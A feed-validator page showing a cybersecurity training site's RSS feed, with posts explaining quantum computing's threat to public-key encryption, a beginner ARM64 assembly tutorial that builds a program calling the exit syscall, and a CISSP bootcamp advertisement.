FEED Validator

for Atom and RSS and KML

Congratulations!

This is a valid RSS feed.

Recommendations

This feed is valid, but interoperability with the widest range of feed readers could be improved by implementing the following recommendations.

line 24, column 85: Image not in required format [help]

... loads/2025/04/cropped-Favicon-32x32.webp</url>
                                             ^

line 112, column 0: content:encoded should not contain fetchpriority attribute [help]
```
<figure class="wp-block-image size-large"><img fetchpriority="high" decoding ...
```
line 112, column 0: content:encoded should not contain decoding attribute (73 occurrences) [help]
```
<figure class="wp-block-image size-large"><img fetchpriority="high" decoding ...
```
line 112, column 0: content:encoded should not contain sizes attribute (72 occurrences) [help]
```
<figure class="wp-block-image size-large"><img fetchpriority="high" decoding ...
```
line 414, column 0: content:encoded should not contain loading attribute (70 occurrences) [help]
```
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" dec ...
```

Source: https://www.hackers-arise.com/blog-feed.xml

<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
>
<channel>
<title>Hackers Arise</title>
<atom:link href="https://hackers-arise.com/feed/" rel="self" type="application/rss+xml" />
<link>https://hackers-arise.com</link>
<description>EXPERT CYBERSECURITY TRAINING FOR ETHICAL HACKERS</description>
<lastBuildDate>Fri, 12 Sep 2025 16:52:25 +0000</lastBuildDate>
<language>en-US</language>
<sy:updatePeriod>
hourly </sy:updatePeriod>
<sy:updateFrequency>
1 </sy:updateFrequency>
<generator>https://wordpress.org/?v=6.8.2</generator>
<image>
<url>https://hackers-arise.com/wp-content/uploads/2025/04/cropped-Favicon-32x32.webp</url>
<title>Hackers Arise</title>
<link>https://hackers-arise.com</link>
<width>32</width>
<height>32</height>
</image>
<item>
<title>What is Quantum Computing How Does It Threaten Cybersecurity?</title>
<link>https://hackers-arise.com/what-is-quantum-computing-how-does-it-threaten-cybersecurity/</link>
<comments>https://hackers-arise.com/what-is-quantum-computing-how-does-it-threaten-cybersecurity/#respond</comments>
<dc:creator><![CDATA[OTW]]></dc:creator>
<pubDate>Fri, 12 Sep 2025 16:32:06 +0000</pubDate>
<category><![CDATA[Cryptography & Encryption]]></category>
<category><![CDATA[Cybersecurity Tools]]></category>
<category><![CDATA[Cyberwarrior]]></category>
<guid isPermaLink="false">https://hackers-arise.com/?p=16471</guid>
<description><![CDATA[Welcome back, my aspiring cyberwarriors! For decades now, people have been talking with baited breath about quantum computing and its potential to revolutionize computing. So far, no commercial products have appeared. This isn’t dissimilar (I know, a double negative) from what happened to artificial intelligence. For decades, people talked about the promise of AI, and […]
The post <a href="https://hackers-arise.com/what-is-quantum-computing-how-does-it-threaten-cybersecurity/">What is Quantum Computing How Does It Threaten Cybersecurity?</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></description>
<content:encoded><![CDATA[Welcome back, my aspiring cyberwarriors!
For decades now, people have been talking with baited breath about quantum computing and its potential to revolutionize computing. So far, no commercial products have appeared. This isn’t dissimilar (I know, a double negative) from what happened to artificial intelligence. For decades, people talked about the promise of AI, and then suddenly, it was upon us and everywhere.
Quantum computing isn’t not upon us yet, but it very close. Maybe 3 years away from hybrid CPU/GPU/QBit machines. That’s not long to prepare for the revolution it will unleash on cybersecurity.
In this post, I want to help you to better understand what quantum computing is and how it will change the discipline we love, cybersecurity. If any of this interests you, we have a Intermediate Cryptography training coming up, October 21-23. We will delve deeper in that class on quantum computing and post quantum cryptography (PQC). 
This is a revolution you don’t want to miss!
What is Quantum Computing?
Quantum computing is an advanced field of computer science that uses the principles of quantum mechanics—such as superposition, entanglement, and interference—to process information in ways that are fundamentally different from classical computers.<a href="https://www.ibm.com/think/topics/quantum-computing" target="_blank" rel="noreferrer noopener"></a>
What is Quantum Mechanics?
Quantum mechanics is the fundamental branch of physics that describes how matter and energy behave at very small scales—typically atoms and subatomic particles. It explains phenomena that classical physics cannot explain, introducing principles like wave-particle duality, superposition, and the uncertainty principle.
<h2 class="wp-block-heading" id="core-principles">Core Principles of Quantum Mechanics</h2>
Wave-particle duality: Quantum entities like electrons and photons show both particle and wave characteristics, depending on how they are measured.<a href="https://www.futurelearn.com/info/courses/frontier-physics-future-technologies/0/steps/240867" target="_blank" rel="noreferrer noopener"></a>
Superposition: A quantum system can exist in multiple states simultaneously until measured, at which point it collapses to a definite state.<a href="https://qt.eu/quantum-principles/" target="_blank" rel="noreferrer noopener"></a>
Uncertainty principle: It is impossible to precisely know both the position and momentum of a particle at the same time (Heisenberg’s Uncertainty Principle).<a href="https://en.wikipedia.org/wiki/Quantum_mechanics" target="_blank" rel="noreferrer noopener"></a>
Quantization: Physical properties such as energy, momentum, and angular momentum can only take discrete values in quantum systems.<a rel="noreferrer noopener" target="_blank" href="https://www.energy.gov/science/doe-explainsquantum-mechanics"></a>
Probability and measurement: Quantum mechanics provides probabilities of outcomes, not certainties—only accounting for what is likely to be measured.<a href="https://consensus.app/questions/what-principles-quantum-mechanics-applications/" target="_blank" rel="noreferrer noopener"></a> This is a fundamental difference between quantum mechanics and traditional mechanics and a major challenge of bringing quantum computing to the commercial and practical use.
<h2 class="wp-block-heading" id="key-concepts">Key Concepts of Quantum Computing</h2>
Qubit: The quantum analogue of the classical bit. Unlike a classical bit, which is always deterministic (either 0 or 1) a qubit can exist in a superposition of both states simultaneously, which allows quantum computers to process many possibilities at once.
<figure class="wp-block-image size-large"><img fetchpriority="high" decoding="async" width="1024" height="483" src="https://hackers-arise.com/wp-content/uploads/2025/09/qubit-superposition-1024x483.jpg" alt="" class="wp-image-18098" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/qubit-superposition-1024x483.jpg 1024w, https://hackers-arise.com/wp-content/uploads/2025/09/qubit-superposition-300x141.jpg 300w, https://hackers-arise.com/wp-content/uploads/2025/09/qubit-superposition-768x362.jpg 768w, https://hackers-arise.com/wp-content/uploads/2025/09/qubit-superposition.jpg 1220w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
Superposition: A principle where a qubit can be both 0 and 1 at the same time. This enables quantum computers to handle much larger computational spaces than classical bits.<a href="https://www.ibm.com/think/topics/quantum-computing" target="_blank" rel="noreferrer noopener"></a>
Entanglement: A phenomenon where qubits become linked such that the state of one instantly influences the state of another, no matter how far apart they are. This property boosts quantum processing power for certain calculations.<a href="https://aws.amazon.com/what-is/quantum-computing/" target="_blank" rel="noreferrer noopener"></a>
Interference: Quantum algorithms are designed to amplify the probability of correct answers and reduce the probability of incorrect ones using interference patterns.<a rel="noreferrer noopener" target="_blank" href="https://en.wikipedia.org/wiki/Quantum_computing"></a>
<h2 class="wp-block-heading" id="why-is-quantum-computing-important">Why Is Quantum Computing Important?</h2>
Quantum computers have the potential to solve complex problems much faster than classical computers, such as factoring large numbers (important in cryptography), simulating molecules for drug discovery, and optimizing large datasets. It is ability to quickly solve factoring very large numbers that is of most interest to us in cybersecurity. Asymmetric encryption is dependent upon the inability of modern, traditional computers to solve these calculations quickly. Quantum computers do not lack this ability and asymmetric encryption algorithms such as RSA are easily broken by quantum computers using Shor’s algorithm.
<figure class="wp-block-image size-large"><img decoding="async" width="1024" height="577" src="https://hackers-arise.com/wp-content/uploads/2025/09/shors-2-1024x577.png" alt="" class="wp-image-18097" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/shors-2-1024x577.png 1024w, https://hackers-arise.com/wp-content/uploads/2025/09/shors-2-300x169.png 300w, https://hackers-arise.com/wp-content/uploads/2025/09/shors-2-768x432.png 768w, https://hackers-arise.com/wp-content/uploads/2025/09/shors-2-1536x865.png 1536w, https://hackers-arise.com/wp-content/uploads/2025/09/shors-2-2048x1153.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
<h2 class="wp-block-heading" id="limitations-and-state-of-the-art">Limitations and State of the Art</h2>
Most quantum computers today are experimental and best suited for specific research or narrow applications but practical applications are on the near horizon. Quantum computing companies such as IONQ have signed contracts with the US Defense Department and US Air Force to offer quantum computing services. This means that state-sponsored actors are likely to have quantum computing capabilities long before the rest of us.
Challenges include qubit stability (decoherence), error rates, and scaling up to large numbers of qubits for practical use. Despite these challenges, industry leaders such as Nvidia’s Jensen Huang, are developing hybrid systems that will integrate CPU’s, GPU’s and Qbits. These will likely be the first commercial systems and are probably only 3 years away. 
<h2 class="wp-block-heading" id="summary-table">Summary Table</h2>
<figure class="wp-block-table"><table class="has-fixed-layout"><thead><tr><th>Classical Computer</th><th>Quantum Computer</th></tr></thead><tbody><tr><td>Bit (0 or 1)</td><td>Qubit (0, 1, both via superposition)</td></tr><tr><td>Deterministic</td><td>Probabilistic</td></tr><tr><td>Linear scaling</td><td>Exponential scaling with qubits</td></tr><tr><td>Limited by classical physics</td><td>Exploits quantum mechanics</td></tr></tbody></table></figure>
Quantum computing represents a revolutionary approach for tasks that remain too hard for today’s most powerful classical systems including asymmetric cryptography(RSA, ECC).
<h2 class="wp-block-heading">How Quantum Computing Threatens Cybersecurity</h2>
Breaking Current Encryption: Quantum computers, thanks to algorithms like Shor’s, will be able to factor large numbers and solve mathematical problems that underpin widely used encryption methods such as RSA and ECC at unprecedented speeds. This means that secure communications (HTTPS, VPNs, digital signatures) and much of the world’s encrypted data could be decrypted by quantum adversaries, exposing sensitive information, financial transactions, private communications, and critical infrastructure.
‘Harvest Now, Decrypt Later’ Threat: Malicious actors may harvest encrypted data today, intending to decrypt it in the future when quantum computing power becomes available
Vulnerable Infrastructure: Industries relying on legacy encryption—such as banking, healthcare, and government—are particularly threatened, as data breaches could result in massive regulatory, financial, and reputational harm
Advanced Malware and Attacks: Quantum computing may also enable more advanced malware, AI-driven attacks, and the rapid discovery of vulnerabilities, further evading current detection systems
Post Quantum Cryptography
Post-quantum cryptography (PQC) is the field focused on designing and standardizing cryptographic algorithms that are secure against attacks by both classical computers and future quantum computers. It aims to protect data and communications from being decrypted by powerful quantum machines that could break today’s widely used public-key cryptography, such as RSA and Elliptic Curve schemes. 

To implement post quantum cryptography will mean replacing today’s hardware and software with new IT infrastructure. Those who fail to do this will no longer enjoy the benefits of confidentiality and privacy. Until this new infrastructure is deployed, the first movers with access to quantum systems will be able break everyone’s cryptography.
Summary
Quantum computing will radically reshape the threat landscape—eroding the security of current systems. Once the state-sponsored entities from the US, Russia, China, and Israel have these systems at their disposal, none of information will be safe. Remember that asymmetric encryption is usually used for key exchange between communicating systems. If the key exchange can be intercepted, nothing is safe!The post <a href="https://hackers-arise.com/what-is-quantum-computing-how-does-it-threaten-cybersecurity/">What is Quantum Computing How Does It Threaten Cybersecurity?</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></content:encoded>
<wfw:commentRss>https://hackers-arise.com/what-is-quantum-computing-how-does-it-threaten-cybersecurity/feed/</wfw:commentRss>
<slash:comments>0</slash:comments>
</item>
<item>
<title>ARM Assembly: Getting Started</title>
<link>https://hackers-arise.com/arm-assembly-getting-started/</link>
<dc:creator><![CDATA[aircorridor]]></dc:creator>
<pubDate>Fri, 12 Sep 2025 13:42:08 +0000</pubDate>
<category><![CDATA[Uncategorized]]></category>
<guid isPermaLink="false">https://hackers-arise.com/?p=18022</guid>
<description><![CDATA[Welcome back, aspiring security researchers! In the world of offensive security, understanding assembly language is important for exploit development, reverse engineering, and vulnerability research. Whether you’re analyzing malware, developing proof-of-concept, or conducting security assessments on ARM-based IoT devices, assembly knowledge gives you the skills to understand how vulnerabilities actually work at the processor level. As […]
The post <a href="https://hackers-arise.com/arm-assembly-getting-started/">ARM Assembly: Getting Started</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></description>
<content:encoded><![CDATA[Welcome back, aspiring security researchers!
In the world of offensive security, understanding assembly language is important for exploit development, reverse engineering, and vulnerability research. Whether you’re analyzing malware, developing proof-of-concept, or conducting security assessments on ARM-based IoT devices, assembly knowledge gives you the skills to understand how vulnerabilities actually work at the processor level.
As you know, many security vulnerabilities exist at the boundary between high-level code and low-level system operations. Buffer overflows, return-oriented programming (ROP), and other exploitation techniques require deep understanding of how programs interact with memory and the processor. Assembly language is the key to understand these concepts.
Besides that, modern exploit development increasingly targets ARM processors due to their prevalence in mobile devices and IoT systems.
ARM Assembly knowledge enables several key security research capabilities:
<ul class="wp-block-list">
<li>Binary Analysis: Understanding how compiled programs actually execute</li>
<li>Exploit Development: Crafting precise memory corruption exploits</li>
<li>Reverse Engineering: Analyzing malware and proprietary software</li>
<li>IoT Security Research: Testing ARM-based embedded devices</li>
<li>Mobile Security: Understanding Android and iOS internals</li>
</ul>
Core advantages of learning ARM Assembly:
<ul class="wp-block-list">
<li><a href="https://hackers-arise.com/arm-cpu-architecture-the-power-of-simplicity-and-efficiency/">RISC Simplicity</a>: Fewer instructions make reverse engineering more straightforward</li>
<li>Predictable Behavior: ARM’s design makes exploit development more reliable</li>
<li>Widespread Deployment: Skills apply across mobile, embedded, and cloud environments</li>
<li>Research Platform: Raspberry Pi provides affordable hardware for security testing</li>
</ul>
Let’s set up a security research environment and explore ARM assembly!
<h2 class="wp-block-heading">Step #1: Hardware Setup</h2>
Generally you have a few options for creating an ARM environment:
1. Raspberry Pi (Recommended – I’ll use Pi 4)
<ul class="wp-block-list">
<li>Real ARM hardware with excellent performance</li>
<li>Perfect for IoT security research scenarios</li>
<li>One-time cost (~$35-75)</li>
<li>Direct hardware access for advanced experiments</li>
</ul>
2. Cloud Virtual Machines
<ul class="wp-block-list">
<li>AWS, Google Cloud, Oracle instances</li>
<li>Scalable but ongoing costs</li>
<li>No hardware purchase required</li>
</ul>
3. Online CPU Emulators
<ul class="wp-block-list">
<li>Zero setup, browser-based (CPUlator, VisUAL)</li>
<li>Limited capabilities – only basic instruction execution</li>
<li>Good for initial learning but not real exploit development</li>
</ul>
4. QEMU Emulators
<ul class="wp-block-list">
<li>Full system emulation with debugging capabilities</li>
<li>Requires technical knowledge and setup</li>
<li>Limited performance compared to native hardware</li>
</ul>
My Recommendation: Start with Raspberry Pi for authentic ARM experience and real-world security research applicability.
Now let’s set up your chosen environment!
<h2 class="wp-block-heading">Step #2: Prepare Your Raspberry Pi</h2>
First of all, we need to install a GCC compiler:
raspberrypi> sudo apt install build-essential binutils
<figure class="wp-block-image aligncenter size-full"><img decoding="async" width="888" height="141" src="https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_install_gcc.webp" alt="" class="wp-image-18023" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_install_gcc.webp 888w, https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_install_gcc-300x48.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_install_gcc-768x122.webp 768w" sizes="(max-width: 888px) 100vw, 888px" /></figure>
It should be installed before we can assemble the files we’re creating, as well as before creating new executable files.
<h2 class="wp-block-heading">Step #3: ARM Registers</h2>
Registers are small storage areas located close to the processor for quick access. They hold various temporary values. When writing an Assembly program, you’ll access them frequently since it’s faster than accessing disk memory or RAM.
If we run uname -a on our Raspberry Pi, we can see output similar to the following:
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="882" height="99" src="https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_uname_info.webp" alt="" class="wp-image-18024" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_uname_info.webp 882w, https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_uname_info-300x34.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_uname_info-768x86.webp 768w" sizes="(max-width: 882px) 100vw, 882px" /></figure>
The output shows that the system is running aarch64, which means a 64-bit ARM architecture (ARMv8-A). The set of available registers depends on the ARM architecture version and execution state. On ARMv8-A in AArch64 state there are 31 general-purpose 64-bit registers, named x0–x30:
<figure class="wp-block-image aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="717" src="https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_arm_registers-1024x717.webp" alt="" class="wp-image-18025" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_arm_registers-1024x717.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_arm_registers-300x210.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_arm_registers-768x538.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_arm_registers-1536x1076.webp 1536w, https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_arm_registers.webp 1890w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Source: https://eclecticlight.co</figcaption></figure>
<ul class="wp-block-list">
<li><code>x0–x30</code> → General-purpose registers: Store values while your program runs.</li>
<li><code>x30</code> → Link register (LR): By convention, stores the return address for function calls.</li>
<li><code>x31</code> → Alias register: Not a physical register; depending on context, it represents either:
<ul class="wp-block-list">
<li><code>sp</code> (stack pointer): Points to the top of the stack (memory used for temporary storage, function calls, and local variables).</li>
<li><code>zr</code> (zero register): Always reads as 0 and discards anything written to it.</li>
</ul>
</li>
<li><code>pc</code> (program counter): Holds the address of the next instruction to execute. Usually not accessed directly.</li>
<li><code>pstate</code> (processor state): Holds flags (zero, negative, carry, overflow) and controls the CPU’s current execution mode.</li>
</ul>
Although most registers can be used freely, software conventions (ABI – Application Binary Interface) assign specific roles, especially for Linux function calls:
<ul class="wp-block-list">
<li><code>x0–x7</code> → Argument registers: Pass arguments to functions; <code>x0</code> also holds the return value.</li>
<li><code>x8</code> → Indirect result register or syscall number.</li>
<li><code>x9–x15</code> → Temporary registers (caller-saved).</li>
<li><code>x19–x28</code> → Callee-saved registers: A function must restore them before returning.</li>
<li><code>x29</code> → Frame pointer (FP): Helps debuggers and stack traces.</li>
<li><code>x30</code> → Link register (LR): Stores return address after a function call.</li>
<li><code>sp</code> → Stack pointer: Points to the top of the stack.</li>
</ul>
<h2 class="wp-block-heading">Step #4: Getting Started with ARM Assembly</h2>
Let’s create a new file called <code>hello.s</code> (the .s extension indicates it’s assembly source code).
We’ll start with .global _start. The .global directive makes the _start label visible outside the program for the linker. (A linker takes compiled code files, connects them by resolving function and variable references, adjusts memory addresses, and produces a single executable.)
The _start label marks a specific location in memory. If you have programming experience, you can think of it like a function name—it labels a memory location, and referencing it gives the value stored there.
Next, let’s add .section .text, which defines the section of the file that holds the program’s instructions.
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="232" height="84" src="https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_start_of_the_script.webp" alt="" class="wp-image-18026"/></figure>
Now that we’ve declared _start as global, we can define our code. We’ll begin with something very simple: just exiting the program and observing the exit code. Usually, when learning a new programming language, we print “Hello World!”, but in Assembly this is more complicated than beginners might expect. So we’ll start with something really basic.
In ARM64 Assembly, we use the special register x8 to pass a value to the kernel that tells it which system call to execute. To know which value to pass to <code>x8</code>, we can refer to the <a href="https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md">Chromium Linux System Call Table</a>.
<figure class="wp-block-image aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="683" src="https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_syscall_table-1024x683.webp" alt="" class="wp-image-18027" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_syscall_table-1024x683.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_syscall_table-300x200.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_syscall_table-768x512.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_syscall_table.webp 1075w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
Here we can look at the required table and find the <code>exit</code> syscall.
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="908" height="273" src="https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_exit_syscode.webp" alt="" class="wp-image-18028" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_exit_syscode.webp 908w, https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_exit_syscode-300x90.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_exit_syscode-768x231.webp 768w" sizes="(max-width: 908px) 100vw, 908px" /></figure>
We need to pass the syscall number to the x8 register to indicate that we want to invoke the exit syscall.
On the right-hand side, you’ll see <code>int error_code</code>, which corresponds to x0, the first argument. This value will be the exit code returned by the program. We’ll print this code to the screen after we write the program.
<h2 class="wp-block-heading">Step #5: MOV Instructions</h2>
In ARM64 (AArch64) assembly, the <code>mov</code> instruction is used to copy a value into a register.
The syntax is simple:
raspberrypi> mov <destination_register>, <source>
We’ll use the mov instruction to set x0—our exit code—to a value, for example, <code>7</code>. To indicate that it’s a constant, we prefix the number with a <code>#</code> sign.
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="425" height="159" src="https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_mov_command.webp" alt="" class="wp-image-18029" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_mov_command.webp 425w, https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_mov_command-300x112.webp 300w" sizes="(max-width: 425px) 100vw, 425px" /></figure>
After that, we need to invoke the actual syscall by setting <code>x8</code>.
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="310" height="84" src="https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_invoke_syscall.webp" alt="" class="wp-image-18030" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_invoke_syscall.webp 310w, https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_invoke_syscall-300x81.webp 300w" sizes="(max-width: 310px) 100vw, 310px" /></figure>
As you can see, the value we assign to x8 is <code>93</code>, which is the system call number for <code>exit</code>.
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="844" height="232" src="https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_syscall_number.webp" alt="" class="wp-image-18031" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_syscall_number.webp 844w, https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_syscall_number-300x82.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_syscall_number-768x211.webp 768w" sizes="(max-width: 844px) 100vw, 844px" /></figure>
Next, we need to trigger a software interrupt to tell the kernel that we want to pass execution to handle a syscall. For this purpose, we use the svc instruction.
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="404" height="204" src="https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_finall_program.webp" alt="" class="wp-image-18032" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_finall_program.webp 404w, https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_finall_program-300x151.webp 300w" sizes="(max-width: 404px) 100vw, 404px" /></figure>
<code>svc</code> requires a value from 0–255, which is passed to the exception handler. However, on Linux ARM64, this value is ignored — the kernel only uses <code>x8</code> (the syscall number). So you can specify any number.
That’s all for the code. Now we can move on to compilation.
<h2 class="wp-block-heading">Step #6: Compilation</h2>
raspberrypi> gcc -nostdlib -o hello hello.s
nostdlib prevents linking with the standard C library and startup files.
To check the file format, you can use:
raspberrypi> file hello
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="888" height="113" src="https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_compiling.webp" alt="" class="wp-image-18033" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_compiling.webp 888w, https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_compiling-300x38.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_compiling-768x98.webp 768w" sizes="(max-width: 888px) 100vw, 888px" /></figure>
It’s a Linux executable. Now we can run the program:
raspberrypi> ./hello
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="883" height="144" src="https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_run_program.webp" alt="" class="wp-image-18034" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_run_program.webp 883w, https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_run_program-300x49.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_run_program-768x125.webp 768w" sizes="(max-width: 883px) 100vw, 883px" /></figure>
You might think that nothing happened, but let’s check the program’s exit code:
raspberrypi> echo $?
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="475" height="88" src="https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_check_exit_code.webp" alt="" class="wp-image-18035" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_check_exit_code.webp 475w, https://hackers-arise.com/wp-content/uploads/2025/09/arm_assembly_check_exit_code-300x56.webp 300w" sizes="(max-width: 475px) 100vw, 475px" /></figure>
That’s the value <code>7</code> we passed to the x0 register.
<h2 class="wp-block-heading">Summary</h2>
In this tutorial, we looked at how to write a simple program in ARM Assembly. We set up a 64-bit Raspberry Pi for this task, learned about the mov instruction, and finally explored software interrupt instructions.
ARM Assembly can be a great first step in exploit development—a skill that makes you highly valuable to employers. If you want to dive deeper, consider becoming a <a href="https://hackersarise.thinkific.com/bundles/subscriber-pro" title="">Hackers-Arise Subscriber Pro</a> to get access to our first edition of <a href="https://hackersarise.thinkific.com/courses/exploit-development-part-1" title="">Exploit Development</a>.
The post <a href="https://hackers-arise.com/arm-assembly-getting-started/">ARM Assembly: Getting Started</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></content:encoded>
</item>
<item>
<title>It’s Time to Elevate Your Cybersecurity Game! Earn the Crown Jewel of Cybersecurity Certifications!</title>
<link>https://hackers-arise.com/it-s-time-to-elevate-your-cybersecurity-game-earn-the-crown-jewel-of-cybersecurity-certifications/</link>
<dc:creator><![CDATA[OTW]]></dc:creator>
<pubDate>Fri, 12 Sep 2025 02:16:41 +0000</pubDate>
<category><![CDATA[Cyberwarrior]]></category>
<category><![CDATA[Hacking]]></category>
<category><![CDATA[BOOTCAMP]]></category>
<category><![CDATA[CISSP]]></category>
<category><![CDATA[CyberSecurity]]></category>
<category><![CDATA[cyberwar]]></category>
<category><![CDATA[cyberwarrior]]></category>
<category><![CDATA[HACKING]]></category>
<guid isPermaLink="false">https://hackers-arise.com/?p=14369</guid>
<description><![CDATA[The CISSP is widely considered to be the premier cybersecurity certifications. The average salary in the US is almost $150,000 and I’ll bet your boss has one. If not, their boss is certified with the CISSP. This is your ticket to a rewarding, high-paying career in cybersecurity. A Four-Day boot camp, September 23-26 Now, you […]
The post <a href="https://hackers-arise.com/it-s-time-to-elevate-your-cybersecurity-game-earn-the-crown-jewel-of-cybersecurity-certifications/">It’s Time to Elevate Your Cybersecurity Game! Earn the Crown Jewel of Cybersecurity Certifications!</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></description>
<content:encoded><![CDATA[The CISSP is widely considered to be the premier cybersecurity certifications. The average salary in the US is almost $150,000 and I’ll bet your boss has one. 
If not, their boss is certified with the CISSP.
This is your ticket to a rewarding, high-paying career in cybersecurity.
A Four-Day boot camp, September 23-26
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="999" height="562" src="https://hackers-arise.com/wp-content/uploads/2025/05/CISSP-Bootcamp-23-26.webp" alt="" class="wp-image-14370" srcset="https://hackers-arise.com/wp-content/uploads/2025/05/CISSP-Bootcamp-23-26.webp 999w, https://hackers-arise.com/wp-content/uploads/2025/05/CISSP-Bootcamp-23-26-300x169.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/05/CISSP-Bootcamp-23-26-768x432.webp 768w" sizes="(max-width: 999px) 100vw, 999px" /></figure>
Now, you can go to the head of the class in cybersecurity with this 4-day intensive bootcamp with Master OTW. This class is available to everyone in the Subscriber package or you can buy the individual LIVE class for just $199
Even if you won’t be taking the exam and earning the certification, this is an excellent class to learn in-depth cybersecurity techniques and technologies used by secure companies from around the world and will help you throughout your long and prosperous career in cybersecurity
Take a look what our students have said about our CISSP bootcamps.
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="533" height="333" src="https://hackers-arise.com/wp-content/uploads/2025/05/CISSP-Testimony.webp" alt="" class="wp-image-14371" srcset="https://hackers-arise.com/wp-content/uploads/2025/05/CISSP-Testimony.webp 533w, https://hackers-arise.com/wp-content/uploads/2025/05/CISSP-Testimony-300x187.webp 300w" sizes="(max-width: 533px) 100vw, 533px" /></figure>

<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="999" height="171" src="https://hackers-arise.com/wp-content/uploads/2025/05/CISSP-TESTIMONY-2.webp" alt="" class="wp-image-14372" srcset="https://hackers-arise.com/wp-content/uploads/2025/05/CISSP-TESTIMONY-2.webp 999w, https://hackers-arise.com/wp-content/uploads/2025/05/CISSP-TESTIMONY-2-300x51.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/05/CISSP-TESTIMONY-2-768x131.webp 768w" sizes="(max-width: 999px) 100vw, 999px" /></figure>

<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="739" height="143" src="https://hackers-arise.com/wp-content/uploads/2025/05/CISSP-TESTIMONY-3.webp" alt="" class="wp-image-14373" srcset="https://hackers-arise.com/wp-content/uploads/2025/05/CISSP-TESTIMONY-3.webp 739w, https://hackers-arise.com/wp-content/uploads/2025/05/CISSP-TESTIMONY-3-300x58.webp 300w" sizes="(max-width: 739px) 100vw, 739px" /></figure>

